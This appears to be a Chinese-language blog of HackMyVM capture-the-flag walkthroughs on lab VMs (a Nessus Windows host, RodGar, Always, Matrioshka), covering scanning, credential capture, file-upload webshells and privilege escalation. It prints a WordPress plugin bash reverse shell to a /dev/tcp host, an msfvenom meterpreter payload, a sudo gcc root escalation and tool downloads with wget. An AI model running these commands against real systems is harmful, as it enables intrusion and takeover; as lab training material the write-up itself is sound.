8834/tcp open ssl/nessus-xmlrpc?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8834-TCP:V=7.94SVN%T=SSL%I=7%D=3/10%Time=67CEE183%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,788,"HTTP/1\.1\x20200\x20OK\r\nCache-Control:\x20must
SF:-revalidate\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/html\r
SF:\nETag:\x20fc785d9fb222132265fb83f9adb1608e\r\nConnection:\x20close\r\n
SF:X-XSS-Protection:\x201;\x20mode=block\r\nServer:\x20NessusWWW\r\nDate:\
SF:x20Tue,\x2011\x20Mar\x202025\x2003:56:40\x20GMT\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nContent-Length:\x201217\r\nContent-Security-Policy:\x
SF:20upgrade-insecure-requests;\x20block-all-mixed-content;\x20form-action
SF:\x20'self';\x20frame-ancestors\x20'none';\x20frame-src\x20https://store
SF:\.tenable\.com;\x20default-src\x20'self';\x20connect-src\x20'self'\x20w
SF:ww\.tenable\.com;\x20script-src\x20'self'\x20www\.tenable\.com;\x20img-
SF:src\x20'self'\x20data:;\x20style-src\x20'self'\x20www\.tenable\.com;\x2
SF:0object-src\x20'none';\x20base-uri\x20'self';\r\nStrict-Transport-Secur
SF:ity:\x20max-age=31536000\r\nExpect-CT:\x20max-age=0\r\n\r\n<!doctype\x2
SF:0html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE
SF:=edge,chrome=1\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Security-Policy\"\x20content=\"upgrade-inse");
MAC Address: 08:00:27:4F:9A:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.95 seconds
这里搜索了一下445端口对应的服务,https://www.cnblogs.com/oksir/p/14735966.html,大概是一个服务,叫做SMB服务,linux中可以使用smbclient来查看这个端口的服务
┌──(root㉿kali-plus)-[~]
└─# smbclient -L 192.168.56.156
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali-plus)-[~]
└─# smbclient //192.168.56.156/Documents
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Oct 19 08:42:53 2024
.. D 0 Sat Oct 19 13:08:23 2024
desktop.ini AHS 402 Sun Jun 16 01:54:33 2024
My Basic Network Scan_hwhm7q.pdf A 122006 Sat Oct 19 06:19:59 2024
My Music DHSrn 0 Sun Jun 16 01:54:27 2024
My Pictures DHSrn 0 Sun Jun 16 01:54:27 2024
My Videos DHSrn 0 Sun Jun 16 01:54:27 2024
Web Application Tests_f6jg9t.pdf A 136025 Sat Oct 19 06:20:14 2024
12942591 blocks of size 4096. 10997216 blocks available
看到有My Basic Network Scan_hwhm7q.pdf和Web Application Tests_f6jg9t.pdf这个文件
可以把他们get下来,但是没什么用,需要爆破用户名和密码,用户名有个坑,得看一眼作者,作者是josemlwdf,看了一下wp发现用户名是jose,密码也得靠运气了或者看能不能找到对应的字典,密码是tequiero,登录进去啥也没有,但是在my account里面有一个proxy server,账号可以看到,但是密码看不了,通过前端把passwd改为text也看不了,但是可以修改服务器地址,把他修改为自己的kali的ip地址
这里面有好几个模式,一个一个尝试了一下,使用Basic模式的时候返回的内容有点可疑,base64解密一波
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 4444
nc: getnameinfo: Temporary failure in name resolution
nc: getnameinfo: Temporary failure in name resolution
CONNECT plugins.nessus.org:443 HTTP/1.1
Proxy-Authorization: Basic bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive
bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
nesus:Z#JuXH$ph-;v@,X&mV)
感觉Z#JuXH$ph-;v@,X&mV)像密码,接下来就没什么思路了,看了眼视频,发现使用了一个叫evil-winrm的工具,工具介绍:https://www.cnblogs.com/backlion/p/17202253.html
Evil-winrm 是一款使用ruby 语言开发的开源工具。 该工具具有许多很酷的功能,包括使用纯文本密码远程登录、SSL 加密登录、 NTLM 哈希登录、密钥登录、文件传输、日志存储等功能。该开发工具的作者不断更新工具并长期维护更新。 使用 evil-winrm,我们可以获得远程主机的 PowerShell命令终端会话。 该工具已在Kali Linux系统中集成,但如果您想单独下载使用,则可以从其官方 git 存储库下载它。
前面是有暗示的,在一开始信息搜集扫描端口的时候,有一个5895端口是开放的,当远程主机开启了Winrm服务时,winrm的默认端口是5895和5896,现在对5895再次进行扫描
┌──(root㉿kali-plus)-[~]
└─# nmap -p 5985 192.168.56.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 19:30 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.156
Host is up (0.00100s latency).
PORT STATE SERVICE
5985/tcp open wsman
MAC Address: 08:00:27:4F:9A:15 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
看到wsman就说明是开启了winrm这个服务的,那么就有思路了,使用evil-winrm这个工具进行登录
evil-winrm -i 192.168.56.156 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
但是这个工具我用不了
┌──(root㉿kali-plus)-[~/evil-winrm/evil-winrm-master]
└─# ruby evil-winrm.rb -i 192.168.56.156 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
user flag
72113f41d43e88eb5d67f732668bc3d1
root flag
这里需要dll劫持
dll劫持教程:抽空学一下吧
https://www.cnblogs.com/Xy--1/p/14487495.html
b5fc5a4ebfc20cc18220a814e1aee0aa
up
信息搜集
mac地址为:00:50:56:2D:04:07 ip地址为192.168.1.103,再收集一下端口信息
┌──(root㉿kali-plus)-[~]
└─# nmap -sC 192.168.1.103 -p 80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 23:35 CST
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00038s latency).
PORT STATE SERVICE
80/tcp open http
|_http-title: RodGar - Subir Imagen
MAC Address: 00:50:56:2D:04:07 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds
有个80端口,访问了是一个文件上传功能,但是只能上传jpg和gif,再扫描一下目录
┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.1.103/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.1.103/__25-03-16_23-42-34.txt
Target: http://192.168.1.103/
[23:42:34] Starting:
[23:42:35] 403 - 278B - /.ht_wsr.txt
[23:42:35] 403 - 278B - /.htaccess.bak1
[23:42:35] 403 - 278B - /.htaccess.orig
[23:42:35] 403 - 278B - /.htaccess.sample
[23:42:35] 403 - 278B - /.htaccess.save
[23:42:35] 403 - 278B - /.htaccess_extra
[23:42:35] 403 - 278B - /.htaccess_orig
[23:42:35] 403 - 278B - /.htaccessBAK
[23:42:35] 403 - 278B - /.htaccessOLD
[23:42:35] 403 - 278B - /.htaccessOLD2
[23:42:35] 403 - 278B - /.htaccess_sc
[23:42:35] 403 - 278B - /.html
[23:42:35] 403 - 278B - /.htm
[23:42:35] 403 - 278B - /.httr-oauth
[23:42:35] 403 - 278B - /.htpasswds
[23:42:35] 403 - 278B - /.htpasswd_test
[23:42:36] 403 - 278B - /.php
[23:42:56] 301 - 319B - /javascript -> http://192.168.1.103/javascript/
[23:43:07] 403 - 278B - /server-status
[23:43:07] 403 - 278B - /server-status/
[23:43:11] 301 - 316B - /uploads -> http://192.168.1.103/uploads/
[23:43:11] 403 - 964B - /uploads/
Task Completed
有个/javascript和/uploads,再把uploads加上再扫描一遍,扫出来一个robots.txt,访问得到:
PD9waHAKaWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIHsKICAgICR0YXJnZXREaXIgPSAidXBsb2Fkcy8iOwogICAgJGZpbGVOYW1lID0gYmFzZW5hbWUoJF9GSUxFU1siaW1hZ2UiXVsibmFtZSJdKTsKICAgICRmaWxlVHlwZSA9IHBhdGhpbmZvKCRmaWxlTmFtZSwgUEFUSElORk9fRVhURU5TSU9OKTsKICAgICRmaWxlQmFzZU5hbWUgPSBwYXRoaW5mbygkZmlsZU5hbWUsIFBBVEhJTkZPX0ZJTEVOQU1FKTsKCiAgICAkYWxsb3dlZFR5cGVzID0gWydqcGcnLCAnanBlZycsICdnaWYnXTsKICAgIGlmIChpbl9hcnJheShzdHJ0b2xvd2VyKCRmaWxlVHlwZSksICRhbGxvd2VkVHlwZXMpKSB7CiAgICAgICAgJGVuY3J5cHRlZEZpbGVOYW1lID0gc3RydHIoJGZpbGVCYXNlTmFtZSwgCiAgICAgICAgICAgICdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JywgCiAgICAgICAgICAgICdOT1BRUlNUVVZXWFlaQUJDREVGR0hJSktMTW5vcHFyc3R1dnd4eXphYmNkZWZnaGlqa2xtJyk7CgogICAgICAgICRuZXdGaWxlTmFtZSA9ICRlbmNyeXB0ZWRGaWxlTmFtZSAuICIuIiAuICRmaWxlVHlwZTsKICAgICAgICAkdGFyZ2V0RmlsZVBhdGggPSAkdGFyZ2V0RGlyIC4gJG5ld0ZpbGVOYW1lOwoKICAgICAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImltYWdlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlUGF0aCkpIHsKICAgICAgICAgICAgJG1lc3NhZ2UgPSAiRWwgYXJjaGl2byBzZSBoYSBzdWJpZG8gY29ycmVjdGFtZW50ZS4iOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICRtZXNzYWdlID0gIkh1Ym8gdW4gZXJyb3IgYWwgc3ViaXIgZWwgYXJjaGl2by4iOwogICAgICAgIH0KICAgIH0gZWxzZSB7CiAgICAgICAgJG1lc3NhZ2UgPSAiU29sbyBzZSBwZXJtaXRlbiBhcmNoaXZvcyBKUEcgeSBHSUYuIjsKICAgIH0KfQo/Pgo=
解密得到源码
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$targetDir = "uploads/";
$fileName = basename($_FILES["image"]["name"]);
$fileType = pathinfo($fileName, PATHINFO_EXTENSION);
$fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);
$allowedTypes = ['jpg', 'jpeg', 'gif'];
if (in_array(strtolower($fileType), $allowedTypes)) {
$encryptedFileName = strtr($fileBaseName,
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');
$newFileName = $encryptedFileName . "." . $fileType;
$targetFilePath = $targetDir . $newFileName;
if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
$message = "El archivo se ha subido correctamente.";
} else {
$message = "Hubo un error al subir el archivo.";
}
} else {
$message = "Solo se permiten archivos JPG y GIF.";
}
}
?>
user flag
发现有一个替换,是rot13,之前上传的shell.jpg被改成了furyy.jpg,上传一个shell.php.gif,然后蚁剑连接
在蚁剑里反弹shell,然后user flag 在/home/rodgar目录下
b45cffe084dd3d20d928bee
提权-root flag
有个clue.txt,查看之后发现告诉我们一个字典的位置,但是是在/root/rodgarpass目录下,无法直接查看,在kali上起一个http服务,使用gobuster对kali进行扫描就能得到字典里面的内容了
sudo gobuster dir -u http://192.168.1.104:9999 -w /root/rodgarpass
┌──(root㉿kali-plus)-[~]
└─# python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
192.168.1.103 - - [17/Mar/2025 00:21:55] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [17/Mar/2025 00:21:55] code 404, message File not found
192.168.1.103 - - [17/Mar/2025 00:21:55] "GET /d7401714-8883-4fdc-a1d9-cc1fccab40ce HTTP/1.1" 404 -
192.168.1.103 - - [17/Mar/2025 00:21:55] code 404, message File not found
192.168.1.103 - - [17/Mar/2025 00:21:55] "GET /b45cffe084dd3d20d928bee85e7b0f2 HTTP/1.1" 404 -
发现有一个b45cffe084dd3d20d928bee85e7b0f2这个md5虽然只有31位,但是cmd5可以解出来是string
应该就是rodgar这个用户的密码了,但是试了好久(没有交互式shell,不知道为什么命令没用了)才发现string不是密码,b45cffe084dd3d20d928bee85e7b0f21才是密码,进去之后还不是root,还要提权
sudo -l
Matching Defaults entries for rodgar on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User rodgar may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make
直接启动一手GTFOBins,搜索gcc或者make即可
sudo gcc -wrapper /bin/sh,-s .
id
uid=0(root) gid=0(root) grupos=0(root)
cd root
ls
rodgarpass
rooo_-tt.txt
cat rooo_-tt.txt
44b3f261e197124e60217d6ffe7e71a8e0175ae0
Always
信息搜集
mac地址为00:0C:29:87:10:2E,确定ip地址为192.168.136.138
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.136.161
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.136.1 00:50:56:c0:00:08 VMware, Inc.
192.168.136.2 00:50:56:e2:99:32 VMware, Inc.
192.168.136.138 00:0c:29:87:10:2e VMware, Inc.
192.168.136.254 00:50:56:e3:e2:84 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.074 seconds (123.43 hosts/sec). 4 responded
端口扫描
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.136.138 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 17:14 CST
Nmap scan report for 192.168.136.138
Host is up (0.00082s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tc open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:87:10:2E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 35.25 seconds
┌──(root㉿kali-plus)-[~]
└─# nmap -sT -sV 192.168.136.138 -p 135,139,445,49152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 17:17 CST
Nmap scan report for 192.168.136.138
Host is up (0.00055s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:87:10:2E (VMware)
Service Info: Host: ALWAYS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.31 seconds
用dirsearch对8080端口进行目录扫描
┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.136.138:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.136.138_8080/_25-03-18_17-21-34.txt
Target: http://192.168.136.138:8080/
[17:21:34] Starting:
[17:21:34] 403 - 199B - /%3f/
[17:21:34] 403 - 199B - /%C0%AE%C0%AE%C0%AF
[17:21:35] 403 - 199B - /%ff
[17:21:38] 403 - 199B - /.ht_wsr.txt
[17:21:38] 403 - 199B - /.htaccess.bak1
[17:21:38] 403 - 199B - /.htaccess.orig
[17:21:38] 403 - 199B - /.htaccess.sample
[17:21:38] 403 - 199B - /.htaccess.save
[17:21:38] 403 - 199B - /.htaccess_extra
[17:21:38] 403 - 199B - /.htaccess_sc
[17:21:38] 403 - 199B - /.htaccessBAK
[17:21:38] 403 - 199B - /.htaccessOLD
[17:21:38] 403 - 199B - /.htaccessOLD2
[17:21:38] 403 - 199B - /.html
[17:21:38] 403 - 199B - /.htaccess_orig
[17:21:38] 403 - 199B - /.htpasswd_test
[17:21:38] 403 - 199B - /.htm
[17:21:38] 403 - 199B - /.httr-oauth
[17:21:38] 403 - 199B - /.htpasswds
[17:21:49] 301 - 242B - /Admin -> http://192.168.136.138:8080/Admin/
[17:21:49] 301 - 242B - /admin -> http://192.168.136.138:8080/admin/
[17:21:49] 200 - 3KB - /admin%20/
[17:21:49] 301 - 242B - /ADMIN -> http://192.168.136.138:8080/ADMIN/
[17:21:49] 301 - 243B - /admin. -> http://192.168.136.138:8080/admin./
[17:21:50] 200 - 3KB - /Admin/
[17:21:50] 200 - 3KB - /admin/
[17:21:51] 200 - 3KB - /admin/index.html
[17:22:07] 403 - 199B - /cgi-bin/
[17:22:07] 500 - 530B - /cgi-bin/printenv.pl
[17:22:25] 403 - 199B - /index.php::$DATA
[17:23:01] 403 - 199B - /Trace.axd::$DATA
[17:23:08] 403 - 199B - /web.config::$DATA
Task Completed
/admin目录有一个登录页面,直接抓包测试一下,测出好多用户名和密码都可以登录,得到了一个admin's note:ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
ftpuser:KeepGoingBro!!!
解密得到ftp的用户名和密码,看看ftp进去能有啥,发现一个robots.txt
User-agent: *
Disallow: /admins-secret-pagexxx.html
访问该路径发现如下信息
Admin's Secret Notes
1) Disable the firewall and Windows Defender.
2) Enable FTP and SSH.
3) Start the Apache server.
4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
其中有一个用户名和密码
always/YouCantFindMe.!.!
但是不知道这个账号密码是用在哪的啊,还是直接用ftpuser的账户登录进去,然后反弹shell吧
user flag
使用msf生成一个shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.136.140 lport=4444 -f exe -o always.exe
然后kali开启一个服务,把文件下载到靶机上
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.136.161
run
bg
use multi/recon/local_exploit_suggester
set session 1
run
HMV{You_Found_Me!}
提权 root flag
然后下面就是找对应的脚本进行提权了
HMV{White_Flag_Raised}
Matrioshka
信息搜集
确定ip地址为192.168.1.105,需要修改一下hosts文件 192.168.1.105 mamushka
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.1.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 3c:06:a7:fa:49:88 TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.101 e0:2e:0b:94:50:57 Intel Corporate
192.168.1.100 12:d6:07:52:ab:25 (Unknown: locally administered)
192.168.1.102 60:e3:2b:ab:61:39 Intel Corporate
192.168.1.105 08:00:27:0e:de:b4 PCS Systemtechnik GmbH
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.103 seconds (121.73 hosts/sec). 5 responded
端口信息搜集
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.1.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 20:43 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.1.105
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:0E:DE:B4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds
user flag
80端口是wordpress博客系统,肯定有个后台管理,但是不知道用户名和密码,现在的思路就是使用wpscan对网站进行扫描,但是wpscan需要一个api token,所以我选择使用nuclei
┌──(root㉿kali-plus)-[~/Desktop/nuclei_3.3.9_linux_amd64]
└─# ./nuclei -u http://mamushka.hmv
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.9
projectdiscovery.io
[INF] Current nuclei version: v3.3.9 (outdated)
[INF] Current nuclei-templates version: v10.1.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 281
[INF] Templates loaded for current scan: 7754
[INF] Executing 7565 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 189 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1711 (Reduced 1609 Requests)
[INF] Using Interactsh Server: oast.fun
[openssh-detect] [tcp] [info] mamushka.hmv:22 ["SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u3"]
[wordpress-readme-file] [http] [info] http://mamushka.hmv/readme.html
[wordpress-login] [http] [info] http://mamushka.hmv/wp-login.php
[CVE-2024-27956] [http] [critical] http://mamushka.hmv/wp-content/plugins/wp-automatic/inc/csv.php
[form-detection] [http] [info] http://mamushka.hmv
[wordpress-xmlrpc-file] [http] [info] http://mamushka.hmv/xmlrpc.php
[http-missing-security-headers:permissions-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:x-frame-options] [http] [info] http://mamushka.hmv
[http-missing-security-headers:x-content-type-options] [http] [info] http://mamushka.hmv
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://mamushka.hmv
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:strict-transport-security] [http] [info] http://mamushka.hmv
[http-missing-security-headers:content-security-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:referrer-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:clear-site-data] [http] [info] http://mamushka.hmv
[mixed-passive-content:img] [http] [info] http://mamushka.hmv ["http://mamushka.htb/wp-content/uploads/2024/08/mamushka-1.jpg","http://mamushka.htb/wp-content/uploads/2024/08/OIG5-1.jpeg","http://mamushka.htb/wp-content/uploads/2024/08/OIG4.jpeg"]
[tech-detect:font-awesome] [http] [info] http://mamushka.hmv
[tech-detect:php] [http] [info] http://mamushka.hmv
[wp-user-enum:usernames] [http] [low] http://mamushka.hmv/?rest_route=/wp/v2/users/ ["admin"]
[wp-enabled-registration] [http] [info] http://mamushka.hmv/?page_id=14
[wp-license-file] [http] [info] http://mamushka.hmv/license.txt
[addeventlistener-detect] [http] [info] http://mamushka.hmv
[wp-enabled-registration] [http] [info] http://mamushka.hmv/?page_id=14
[apache-detect] [http] [info] http://mamushka.hmv ["Apache/2.4.61 (Debian)"]
[php-detect] [http] [info] http://mamushka.hmv ["8.2.22"]
明显扫描出来一个CVE-2024-27956搜了一下是插件的漏洞,并且找到了WP-Automatic这个插件,去exploit-db上搜了一下这个插件的poc,好像都不能用,试试在msf里面搜索
msf6 > search WP-Automatic
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/wp_automatic_plugin_privesc 2021-09-06 normal Yes WordPress Plugin Automatic Config Change to RCE
1 exploit/multi/http/wp_automatic_sqli_to_rce 2024-03-13 excellent Yes WordPress wp-automatic Plugin SQLi Admin Creation
2 \_ target: PHP In-Memory . . . .
3 \_ target: Unix/Linux Command Shell . . . .
4 \_ target: Windows Command Shell . . . .
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_automatic_sqli_to_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
搜到了一个24年比较新的,直接来使用试试
use exploit/multi/http/wp_automatic_sqli_to_rce
show options
set rhost 192.168.1.105
run
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > run
[-] Handler failed to bind to 192.168.1.105:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[+] The target is vulnerable. Target is vulnerable to SQLi!
[-] Exploit aborted due to failure: unexpected-reply: Failed to log in to WordPress admin.
[*] Exploit completed, but no session was created.
这个脚本的作用就是添加一个用户,这个用户的用户名和密码是herminia.lebsack/j3FYu3YO,但是进去之后没地方反弹shell,看了一眼wp,是自己写的一个php脚本,然后打包成zip,这个脚本内容如下:
<?
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.104/1234 0>&1'");
?>
然后上传文件,点击激活插件,激活之前监听1234端口,这样就能把shell弹回来了,但是这个wordpress应该是docker搭建的,从www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$可以看出来,那就先看一下环境变量
www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ env
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/wp-admin
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env
得到用户名和密码
matrioska
Fukurokuju
ssh连一下,但是没连上,看了一下这个用户名感觉像是靶机名字,有感觉有点区别,尝试用matrioshka作为用户名连接,成功连接上去了,拿到user flag
matrioshka@matrioshka:~$ ls
user.txt
matrioshka@matrioshka:~$ cat user.txt
c8129b0390452d8378535cff76e0dde8
提权-root flag
先把fscan和socat这2个工具给下载到靶机
busybox wget 192.168.1.104:9999/fscan
busybox wget 192.168.1.104:9999/socat/socat-1.8.0.3
先看一下ip情况
matrioshka@matrioshka:/tmp$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
